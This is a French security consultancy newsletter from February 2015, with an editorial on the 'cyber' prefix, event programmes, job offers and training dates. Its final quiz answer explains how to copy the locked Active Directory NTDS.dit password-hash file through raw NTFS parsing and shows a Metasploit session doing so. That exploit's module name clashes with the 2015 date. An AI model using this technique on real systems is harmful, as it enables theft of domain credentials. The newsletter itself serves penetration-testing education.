[Newsletter HSC] N°126 - Février 2015

Newsletter d'information de HSC newsletter at hsc-news.com
Mar 17 Fév 15:18:20 CET 2015


========================================================================
              HSC Newsletter  --  N°126 --  février 2015
========================================================================



             « Le meilleur manager est celui qui sait trouver les talents
               pour faire les choses, et qui sait aussi réfréner son envie
               de s'en mêler pendant qu'ils les font. »

                                        [ Theodore Roosevelt ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial - Cyber ?
      2. Le saviez-vous ? La question
      3. Programme de la conférence JSSI de l'OSSIR du 10 mars
      4. Programme partiel de la conférence annuelle du Club 27001 du 24 mars
      5. Programme des GS-DAYS du 24 mars (code de réduction HSC)
      6. Offres d'emploi HSC by Deloitte : consultants débutants et séniors
      7. HSC by Deloitte partenaire des GS-DAYS 2015
      8. Agenda des interventions publiques
      9. Prochaines formations HSC
     10. Actualité des associations : Club 27001, OSSIR et Clusif
     11. Le saviez-vous ? La réponse



--[ 1. Éditorial - Béatrice Joucreau & Christophe Renard ]---------------

     Cybersécurité, cybercriminalité, cybermenace, cyberguerre... tout un
 ensemble de nouveaux mots résonne depuis quelque temps dans le monde de la
 sécurité. Tous sont fondés sur un mot existant, préfixé du terme "cyber",
 probablement afin de distinguer les problématiques de la SSI des
 problématiques de gestion de risque, de défense et de sécurité classiques.
 Le résultat : une ambiance années 80 et une consonance de science-fiction
 désuète par des références au cyberpunk. Pas de quoi donner une image
 crédible de la SSI au grand public.
 Pourtant l'idée est compréhensible.
 Il s'agit sans doute d'une tentative de simplification de l'expression
 "sécurité des systèmes d'information". L'ennui, c'est que "cyber" n'est
 absolument pas un préfixe. Il provient d'un mot grec qui signifie
 "gouvernail", et qui a été utilisé pour former le mot "cybernétique",
 littéralement "étude des moyens de gouvernement", qui s'applique autant à
 l'informatique qu'à la biologie ou à l'économie. D'ailleurs on voit bien
 que "nétique" tout court n'existe pas. Quitte à utiliser un préfixe pour
désigner l'ordre, les textes officiels auraient pu utiliser "ordi", comme
 pour "ordiphone"...

     Quelle différence l'administration fait-elle entre la cybersécurité et
 la sécurité des systèmes d'information ? Selon la définition donnée par
 le SGDSN, la cybersécurité [1] est "l'état recherché pour un système
 d'information lui permettant de résister à des événements issus du
 cyberespace" [2] (c'est-à-dire les réseaux mondiaux) "susceptibles de
 compromettre la disponibilité, l'intégrité ou la confidentialité des données
 stockées, traitées ou transmises et des services connexes que ces systèmes
 offrent ou qu'ils rendent accessibles. La cybersécurité fait appel à des
 techniques de sécurité des systèmes d'information et s'appuie sur la lutte
 contre la cybercriminalité et sur la mise en place d'une cyberdéfense."

 Cette définition exclurait un certain nombre de menaces, soit non liées à
 Internet (l'ingénierie sociale par exemple : cf. l'arnaque au président, ou
 bien des menaces internes), soit non-délibérées ou non-humaines (erreur,
 menace environnementale), ainsi que toutes les vulnérabilités et menaces
 liées à l'information hors de l'outil informatique proprement dit (écran
 d'ordinateur visible dans le train, information papier, conversations). La
 distinction est rarement faite dans la pratique, car présentant peu
 d'intérêt.

 Pourquoi "cybersécurité" ? Derrière cette nouvelle dénomination il faut voir
 une tentative de "vendre" la sécurité de l'information. Les plus cyniques
 n'y verront que les visées commerciales opportunistes. Mais alors que notre
 dépendance sur les systèmes d'information est devenue irréversible et totale,
 alors que la sécurité desdits systèmes est globalement restée misérable, une
 réalisation dans la panique pourrait bien permettre de mobiliser au-delà de
 notre communauté.
 Utiliser un terme aux consonances anglaises (çaillebeur-sécurité) vise à
 promouvoir de la SSI "améliorée" à un public incapable d'une concentration
 dépassant les 6 syllabes. Adopter cette terminologie, c'est admettre
 que la SSI a besoin de changer de costume pour sortir de son ghetto.

 Malgré le ridicule, dire "cyber", c'est bien sûr faire de la communication.
 Les retours des médias prouvent que la démarche porte et le terme est
 maintenant ancré. La "cybersecurité" arrivera-t-elle à faire travailler
 ensemble métiers et techniques, institutions et privé, agences
 gouvernementales et industriels lourds alors que la SSI est restée une
 affaire de spécialistes ? Il faut l'espérer car les enjeux sont vitaux.

 A quand une Agence Nationale de la Cybersécurité pour coordonner la mise en
 oeuvre de cette stratégie ? Cette nouvelle dénomination de l'ANSSI pourrait
 être la première communication du cyber-préfet.

 [1] http://www.ssi.gouv.fr/IMG/pdf/2011-02-15_Defense_et_securite_des_systemes_d_information_strategie_de_la_France.pdf

 [2] On notera, sans voir à mal que le terme cyberespace a été inventé par
 William Gibson dans sa nouvelle Neuromancien et qu'il l'y définissait comme :
 "Cyberspace. A consensual hallucination experienced daily by billions of
 legitimate operators, in every nation, by children being taught mathematical
 concepts... A graphic representation of data abstracted from the banks of
 every computer in the human system. Unthinkable complexity. Lines of light
 ranged in the nonspace of the mind, clusters and constellations of data.
 Like city lights, receding..."



--[ 2. Le saviez-vous ? La question ]------------------------------------

     Après la compromission d'un domaine Active Directory, l'étape suivante
 consiste souvent à récupérer la liste des utilisateurs et le condensat de
 leur mot de passe. Ces informations sont stockées dans le fichier NTDS.dit
 situé sur le contrôleur de domaine.

 Ce fichier est néanmoins verrouillé par le système afin de ne pas autoriser
 d'accès concurrent et il est impossible de simplement le lire ou le copier.
 Le contournement couramment utilisé consiste alors à en faire un instantané
 avec le système de Volume Shadow Copy. Ce service n'est cependant pas
 forcément démarré et il peut être dérangeant en test d'intrusion de
 l'utiliser (génération de journaux, utilisation d'espace disque...).

 Savez-vous comment récupérer le fichier NTDS.dit sans utiliser le système de
 Volume Shadow Copy ni redémarrer la machine ?

     Réponse au paragraphe 11.



--[ 3. Programme de la conférence JSSI de l'OSSIR du 10 mars ]-------

     La journée de la Sécurité des Systèmes d'Information, organisée par
 l'OSSIR, se déroulera le mardi 10 mars 2014 à Paris à la Maison des
 Associations, 10/18, rue des terres au curé 75013 Paris
 (http://www.mas-paris.fr/plan.html) de 8h30 à 17h30.

  8h30 : Accueil des participants et café offert
  9h00 : Discours d'ouverture du président de l'OSSIR
  9h15 : Keynote
          . Vincent Strubel, sous-directeur "Expertise", ANSSI
  9h45 : Présentation du système d'exploitation sécurisé CLIP
          . Vincent Strubel, sous-directeur "Expertise", ANSSI
 10h30 : pause café
 11h00 : Les produits de sécurité français vus des tranchées
          . Nicolas Ruff, expert sécurité, Google
 11h45 : Révolution cyberindustrielle et facteurs de cyberpuissance
          . Laurent Bloch, chercheur, Institut Français d'Analyse Stratégique
 12h30 : Buffet déjeunatoire
 14h00 : Conférence invitée
          . Alain Bensoussan, avocat, Alain Bensoussan Avocats
 14h45 : souverain vu par une start-up

 15h30 : pause café
 15h50 : La Loi de Programmation Militaire pour un petit OIV
          . Christophe Renard et Béatrice Joucreau, consultants en sécurité;
            HSC by Deloitte
 16h35 : Conférence invitée
 17h30 : clôture de la journée

     Inscription à la journée, déjeuner et trois pauses incluses :
        - 15 euros pour les adhérents de l'OSSIR
        - 30 euros pour les étudiants (copie carte d'étudiant)
        - 75 euros pour les non-adhérents

 L'inscription est validée après réception du règlement ou du bon de
 commande par courrier postal adressé à l'OSSIR, 45 rue d'Ulm, 75230 Paris
 cedex 05, en prévenant de votre envoi à jssi15 at ossir.org
 Payement par paypal disponible :
 http://www.ossir.org/association/index/reglement-paypal.shtml
 L'OSSIR ne peut pas être jointe par télécopie ou par téléphone.
 Programme détaillé : http://www.ossir.org/jssi/index/jssi-2015.shtml



--[ 4. Programme de la conférence annuelle du Club 27001 du 24 mars ]----

     Le Club 27001 (http://www.club-27001.fr/) organise sa huitième
 conférence annuelle sur l'ensemble de la série des normes ISO 27001
 le mardi 24 mars 2014 à l'espace Saint-Martin, dans le cadre des GS-DAYS.

     Le programme définitif n'est pas encore terminé, cependant, les
 retours d'expérience d'Outscale et Securiview par leurs PDGs respectifs,
 celle de l'ancien RSSI d'une collectivité territoriale, et le retour
 d'expérince d'Orange dans l'évaluation de la sécurité des fournisseurs
 sont confirmés.


 Inscription à la conférence : 290 euros pour les adhérents au Club 27001,
 590 euros pour les non-adhérents (inclut les pauses café et le déjeuner).

 Rappel : l'adhésion au Club 27001 n'est que de :
        - pour un particulier : 27 euros,
        - pour une entreprise : 270 euros (donnant droit à 5 entrées à la
          conférence au prix remisé), soit une économie jusqu'à 1500 euros

 Lieu : Espace Saint-Martin au 199 bis, rue Saint-Martin, 75003 Paris
        http://www.gsdays.fr/infos-pratiques/
 Plan : http://www.espacesaintmartin.com/paris/html/plan.html

 Contact : conference at club-27001.fr
 Le Club 27001 ne peut pas être joint par télécopie ou par téléphone.

 Bulletin d'inscription :
 http://www.club-27001.fr/attachments/article/153/club27001_conference_2015.pdf

 Envoyez votre bulletin d'inscription complété au trésorier du Club 27001
 Carl Roller : tresorier at club-27001.fr



--[ 5. Programme des GS-DAYS du 24 mars (code de réduction HSC) ]--------

     La 7ème édition des GS Days, Journées Francophones de la Sécurité de
 l'Information, se tiendra le 24 mars de 8h30 à 18h30, à l'Espace
 Saint-Martin entièrement rénové (http://www.gsdays.fr/infos-pratiques/).
 Voici le programme prévisionnel de la journée :

  8h30 : Accueil des participants et café offert
  9h00 : Conférence plénière : la structuration du marché de la sécurité
         Table ronde avec Guillaume Poupard (ANSSI), Michel Van Den Berghe
         (Orange), etc, animée par Alain Establier, rédacteur en Chef de
         la revue Security Defense
 10h30 : pause café
 11h00 : "CARA : les 4 dimensions de la sécurité des objets connectés"
         . Gérôme Billois et Chadi Hantouche (Solucom)
 11h00 : "Attaque de type "Man-In-The-Middle" sur réseau "dual stack""
         . Karim Sudki (SCRT)
 11h55 : "Usages de la mobilité au sein de l'entreprise (du BYOD au COPE)
         . Diane Mullenex et Guillaume Morat (Pinsent Masons LLP)
 11h55 : "Comment le Big Data améliore la sécurité sur le Web ?"
         . Emmanuel Macé (Akamai)
 12h45 : Déjeuner
 14h15 : "Comprendre et détecter une intrusion physique de haut vol"
         . Alexandre Triffault (OFC)
 14h15 : "Objets connectés et protection de vie privée : l'impossible accord ?"
          . Rose-Marie Borges, Université d'Auvergne
 15h10 : "La gestion de crise IT/SSI"
          . Thomas Le Poetvin et Mikaël Smaha (HSC by Deloitte)
 15h10 : "La quête du code source maintenable, fiable et sécurisé"
          . Sébastien Gioria (Advens)
 16h00 : pause café
 16h30 : "Exploitation de failles de sécurité : démonstrations pratiques"
          . Laurent Chouraki et Renaud Lifchitz (ARCSI)
 16h30 : "Le visuel au service de plus de clarté en cybersecurité"
          . Hadi El-Khoury (ISSA France)
 17h25 : "Mobilité et Sécurité, peut-on encore espérer faire coexister ces
          deux concepts ?
          . Jean-Marc Grémy (Cabestan Consultants)
 17h25 : "Touch-ID, authentification mobile et OAuth, quelle confiance
          vis-à-vis de ces nouveaux mécanismes ?"
          . Guillaume Coindet (Harmonie Technologie)
 18h15 : Cocktail de clôture

 Programme détaillé : http://www.gsdays.fr/a-propos/programme
 Inscription en ligne : http://www.gsdays.fr/sinscrire/10-gsdays.html
 Formulaire d'inscription papier :
     http://www.gsdays.fr/formulaire_inscription.pdf

 Utilisez le code d'HSC pour vous inscrire : 205Bax07 et bénéficiez d'un
 tarif réduit de 135 euros HT au lieu de 165 euros HT.



--[ 6. Offres d'emploi HSC pour consultants en sécurité & continuité ]---

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluri-disciplinaire, qui couvre tous les aspects liés à la sécurité et
 continuité, des tests d'intrusion à l'expertise judiciaire, de la
 rétroingénierie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc, pour des missions d'expertise
 variées et haut-de-gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Neuilly-sur-Seine (Paris), au pied du métro
 Pont de Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 7. HSC by Deloitte partenaire des GS-DAYS à Paris ]-------------

     HSC sera présent aux GS-DAYS le 24 mars prochain de 8h30 à 18h30 à
 l'Espace Saint-Martin (http://www.gsdays.fr/infos-pratiques/) au 199 bis,
 rue Saint-Martin, 75003 Paris. Notre équipe avec Adrien Pasquier pour les
 prestations et François Martinelli pour les formations sera à votre
 disposition sur notre stand.

 Inscription obligatoire.

 Programme détaillé : http://www.gsdays.fr/a-propos/programme
 Inscription en ligne : http://www.gsdays.fr/sinscrire/10-gsdays.html
 Formulaire d'inscription papier :
     http://www.gsdays.fr/formulaire_inscription.pdf

 Utilisez le code d'HSC pour vous inscrire : 205Bax07 et bénéficiez d'un
 tarif réduit de 135 euros HT au lieu de 165 euros HT.



--[ 8. Agenda des interventions publiques ]-------------------------------

 - 10 mars 2015 - JSSI de l'OSSIR - Paris
   "La Loi de Programmation Militaire pour un petit OIV" par Béatrice Joucreau
   et Christophe Renard
   http://www.ossir.org/jssi/index/jssi-2015.shtml

 - 24 mars 2015 - GSDAYS - Paris
   "La gestion de crise IT/SSI" par Thomas Le Poetvin et Mikaël Smaha


 - 2 avril 2015 - Security Day Luxembourg - Luxembourg
   "Investigation numérique" par Baptiste Dolbeau

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 9. Prochaines formations HSC ]---------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        Formation CISSP    .....................    : 2 au 6 mars (#)
        ISO 27001 Lead Implementer    ..........    : 9 au 13 mars (#)
        ISO 27001 Lead Auditor    ..............    : 16 au 20 mars (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 16 au 20 mars (*)(#)
        ISO 27005 Risk Manager    ..............    : 23 au 25 mars (#)
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : 23 au 27 mars 2015 (*)(#)
        Formation RSSI    ......................    : 30 mars au 3 avril
        Essentiels techniques de la SSI    .....    : 2 et 3 avril
        EBIOS Risk Manager    ..................    : 8 au 10 avril (#)
        Correspondant Informatique et Libertés      : 8 au 10 avril (@)
        ISO 22301 Lead Auditor    ..............    : 13 au 17 avril (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 13 au 18 avril (*)(#)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 20 au 24 avril (*)(#)
        PKI : principes et mise en oeuvre    ...    : 4 au 6 mai 2015 (*)
        ISO 27005 Risk Manager    ..............    : 11 au 13 mai (#)
        ISO 27001 Lead Implementer    ..........    : 18 au 22 mai (#)
        Essentiels Informatique et Liberté   ...    : 18 mai
        Essentiels juridiques pour gérer la SSI     : 21 et 22 mai
        Sécurité du Cloud Computing    .........    : 26 au 28 mai
        Sécurité SCADA    ......................    : 27 au 29 mai
        Essentiel de PCI-DSS    ................    : 28 mai
        RGS v2 : la SSI pour le secteur public      : 29 mai
        Inforensique réseau avancée (SANS FOR572)   : 1 au 5 juin 2015 (*)
        ISO 22301 Lead Implementer    ..........    : 8 au 12 juin (#)
        Mesures de sécurité ISO 27002:2013   ...    : 15 et 16 juin
        Indicateurs & tableaux de bord SSI/ISO27004 : 17 juin
        Gestion des incidents de sécurité/ISO27035  : 18 juin
        Gestion de crise IT/SSI    .............    : 19 juin 2015
        Risk Manager Avancé    .................    : 25 et 26 juin
        Essentiels de l'ISO22301    ............    : 11 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 28 sep au 2 oct (*)(#)
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 2 au 6 novembre (*)(#)
        Sécurité du WiFi    ....................    : 9 et 10 novembre (*)
        Inforensique ordiphones/tablettes (FOR585)  : 16 au 20 novembre (*)(#)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 23 au 27 novembre (*)(#)
        Expert Sécurité Linux LPI 303   ........    : 23 au 27 novembre (*)(#)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 14 au 18 décembre (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 22301 Lead Implementer    ..........    : 2 au 6 mars 2015 (#)
        Essentiels de l'ISO27001:2013    .......    : 24 avril
        Formation CISSP    .....................    : 18 au 22 mai (#)
        ISO 27005 Risk Manager    ..............    : 3 au 5 juin (#)
        ISO 27001 Lead Implementer    ..........    : 15 au 19 juin (#)


 - Lille
        Correspondant Informatique et Libertés      : 16 au 18 mars 2015 (@)

 - Lyon
        Correspondant Informatique et Libertés      : 4 au 6 mai 2015 (@)

 - Marseille
        Correspondant Informatique et Libertés      : 22 au 24 avril 2015 (@)

 - Rennes
        Correspondant Informatique et Libertés      : 8 au 10 juin (@)

 - Strasbourg
        Correspondant Informatique et Libertés      : 22 au 24 juin (@)

 - Toulouse
        Correspondant Informatique et Libertés .    : 21 au 23 janvier (@)
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre (#)
        Correspondant Informatique et Libertés .    : 4 au 6 novembre (@)
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 158 379 042

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2015 en PDF sur http://www.hsc-formation.fr/



--[ 10. Actualité des associations : Club 27001, OSSIR et Clusif ]--------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris jeudi 23 janvier 2015 chez Solucom
         - "Le logiciel Score Compliance" par Thierry Ramard (Ageris)
         - Faites de propositions pour la secondes présentation
     . Prochaine réunion à Toulouse le vendredi 27 février au Mipih
         - Programme en cours de confirmation
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 10 février à l'INRIA
         - "HAVEX-RAT _ Toute l'histoire" par Giovanni Rattaro et Renaud Leroy
           (Openminded)
         - "À TOR et à travers : Etude du réseau d'anonymisation en 2015,
           utilisation et faiblesses" par Régis Senet (XMCO)
         - Revue de vulnérabilités
     . Conférence annuelle JSSI le 10 mars
     . Réunion suivante à Paris le mardi 14 avril à l'INRIA
         - "le skimming" par Thomas Souvignet et Matthieu Regnery (Gendarmerie
           - IRCGN)
         - seconde présentation en cours de confirmation
         - Revue de vulnérabilités
     . Prochaine réunion à Toulouse mardi 17 février
         - "Présentation et utilisation avancées de Mimikatz" par Benjamin
            Delpy
         - "Solution du Challenge NoSuchCon 2014" par Vincent Fargues et
           David Berard (Thales)
     . Prochaine réunion à Rennes non planifiée.

 o Clusif (http://www.clusif.fr/)
     . Prochaines conférences les 16 avril et 17 juin, programme à paraître
       réservez vos dates :
       http://www.clusif.fr/



--[ 11. Le saviez-vous ? La réponse ]------------------------------------

     Linux permet d'accéder aux partitions en "brut" à l'aide du fichier de
 bloc (par exemple /dev/sda1). Sous Windows une fonctionnalité similaire est
 fournie pour accéder aux volumes bruts en utilisant le fichier "\\.\C:".

 La difficulté consiste alors à déterminer quoi lire pour récupérer le contenu
 du fichier recherché.

 Pour ce faire, certains raccourcis existent. Par exemple l'outil nfi.exe de
 Microsoft[1] peut être utilisé pour récupérer les adresses physiques du
 fichier voulu dans \\.\C:. Pour cela, nfi.exe a besoin d'ouvrir le fichier, ce
 qui n'est pas possible avec NTDS.dit puisque celui-ci est verrouillé par le
 système. Néanmoins, lorsqu'on utilise nfi.exe directement sur le volume (C:),
 celui-ci va récupérer les adresses physiques de tous les fichiers en faisant
 appel à la fonction de l'API Windows NtFsControlFile et le paramètre
 FSCTL_GET_NTFS_FILE_RECORD. Cette fonction permet à partir d'un numéro
 d'enregistrement approximatif d'obtenir le fichier ayant le numéro
 d'enregistrement le plus proche. nfi.exe énumère donc de façon exhaustive tous
 les fichiers afin de récupérer leurs adresses physiques, puis avec une simple
 lecture octet par octet du fichier \\.\C: il est possible de récupérer le
 contenu de n'importe quel fichier du système[2][3]. Néanmoins cette technique
 n'est pas optimale et peut être longue et coûteuse en ressources du système.

 Une manière de faire plus élégante est de directement lire les structures du
 système de fichiers NTFS afin de parcourir correctement le disque et découvrir
 où sont enregistrées les données du fichier.

 Chaque fichier d'un système de fichiers NTFS est une entrée dans un fichier
 spécial du système appelé MFT (Master File Table).

 Ces entrées contiennent plusieurs attributs dont par exemple le nom du fichier
 dans l'attribut "FILE_NAME" et le contenu du fichier dans l'attribut "DATA".
 De plus, les entrées de la MFT correspondant à un répertoire utilisent les
 attributs "INDEX_ROOT" et "INDEX_ALLOCATION" afin de stocker les associations
 entre le nom des fichiers du répertoire et leurs entrées dans la MFT.

 Ces attributs peuvent être stockés directement dans la MFT (attribut résident)
 ou en dehors (attribut non-résident). Pour récupérer la valeur des attributs
 non résidents, la MFT stocke une liste d'offsets qui pointent vers
 l'emplacement où est stockée cette valeur sur le disque.

 En parcourant l'arborescence du système de fichiers dans la MFT et en lisant
 les bons attributs, il est alors possible de retrouver l'entrée du fichier et
 de lire son attribut DATA pour en récupérer le contenu.

 Quelques informations supplémentaires peuvent être utiles :
 - un volume NTFS commence par le "Partition Boot Sector" qui contient
   notamment l'adresse de la MFT.
 - la MFT est un fichier. Elle est représentée par l'entrée 0 dans la MFT et
   son contenu est décrit dans l'attribut non-résident "DATA", comme tous les
   autres fichiers.
 - la lecture du système de fichiers étant brute, si le disque est chiffré, à
   l'aide de bitlocker par exemple, cette technique ne pourra pas fonctionner
   sans implémenter aussi le déchiffrement du disque.

 À l'aide de ces informations il est alors possible de créer un parser NTFS
 capable de lire et comprendre le système de fichiers pour récupérer le
 contenu d'un fichier arbitraire. Une version en ruby a été proposée au
 cadre metasploit[4] dans la partie parser de la bibliothèque Rex. Un module
 de post exploitation a aussi été ajouté afin de permettre l'appel de ce
 parseur NTFS depuis un shell meterpreter.

 Pour l'utiliser, une fois que vous avez un shell meterpreter, il suffit
 d'utiliser le module et de définir le chemin du fichier que vous voulez
 récupérer :

   meterpreter > background
   exploit(ms18_042_tcpstack) > use post/windows/gather/file_from_raw_ntfs
   post(file_from_raw_ntfs) > set SESSION 1
   SESSION => 1
   post(file_from_raw_ntfs) > set FILE_PATH C:\\Windows\\NTDS\\ntds.dit
   FILE_PATH => C:\Windows\NTDS\ntds.dit
   post(file_from_raw_ntfs) > run

   [*] Trying to gather C:\Windows\NTDS\ntds.dit
   [+] Saving file : /home/msf/.msf4/loot/20150213101556_default_10.0.0.101_windows.file_454372.dit
   [*] Post Successful
   [*] Post module execution completed


 Danil Bazin

 [1] https://support.microsoft.com/kb/253066
 [2] http://www.ivanlef0u.tuxfamily.org/?p=72
 [3] http://www.tracesecurity.com/core/fileparse.php/97492/urlt/0053310-Circumventing_Controls_TraceSecurity_2012.pdf
 [4] https://github.com/rapid7/metasploit-framework/pull/4679



Plus d'informations sur la liste de diffusion newsletter